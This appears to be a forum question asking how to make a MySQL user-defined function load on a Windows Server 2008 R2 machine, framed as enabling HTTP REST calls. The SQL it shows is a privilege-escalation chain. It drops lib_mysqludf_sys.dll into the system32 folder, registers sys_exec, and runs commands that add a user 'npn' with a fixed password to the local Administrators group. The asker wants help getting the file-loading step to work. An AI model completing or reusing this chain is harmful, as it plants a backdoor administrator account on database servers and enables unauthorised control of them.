# User-defined function (UDF) for HTTP REST in windows

Tags: mysql, windows, plugins, user-defined-functions, windows-server-2008-r2

I have **windows 2008 r2 server pc**,
I try **command execute by the mysql query** as follows:

```
USE mysql;
CREATE TABLE npn(line blob);
INSERT INTO npn values(load_files('C://xampplite//htdocs//mail//lib_mysqludf_sys.dll'));
SELECT * FROM mysql.npn INTO DUMPFILE 'c://windows//system32//lib_mysqludf_sys.dll';
CREATE FUNCTION sys_exec RETURNS integer SONAME 'lib_mysqludf_sys.dll';
SELECT sys_exec("net user npn npn12345678 /add");
SELECT sys_exec("net localgroup Administrators npn /add");
```

The problems arise with line 3:

> INSERT INTO npn values(load_files('C://xampplite//htdocs//mail//lib_mysqludf_sys.dll'));

### Questions:

- how do I define the load_files function?
- which path i use instead of `C://xampplite//htdocs//mail//lib_mysqludf_sys.dll`
- The steps are only for a [Linux Server](https://code.google.com/p/mysql-udf-http). How can I define the MySQL User-defined function (UDF) for HTTP REST for a Windows server?